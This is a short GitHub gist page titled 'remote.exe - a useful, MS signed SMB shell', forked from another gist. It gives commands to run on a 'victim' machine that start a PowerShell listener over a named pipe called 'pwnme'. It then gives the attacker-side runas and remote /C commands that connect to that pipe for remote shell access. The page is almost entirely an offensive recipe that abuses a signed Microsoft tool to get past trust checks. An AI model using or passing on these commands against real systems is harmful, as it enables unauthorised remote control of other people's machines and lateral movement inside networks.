Forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
Created
November 7, 2017 07:02
-
-
Save ashr/60d3389837d11a1a497cdb4f8e89d784 to your computer and use it in GitHub Desktop.
remote.exe - a useful, MS signed SMB shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment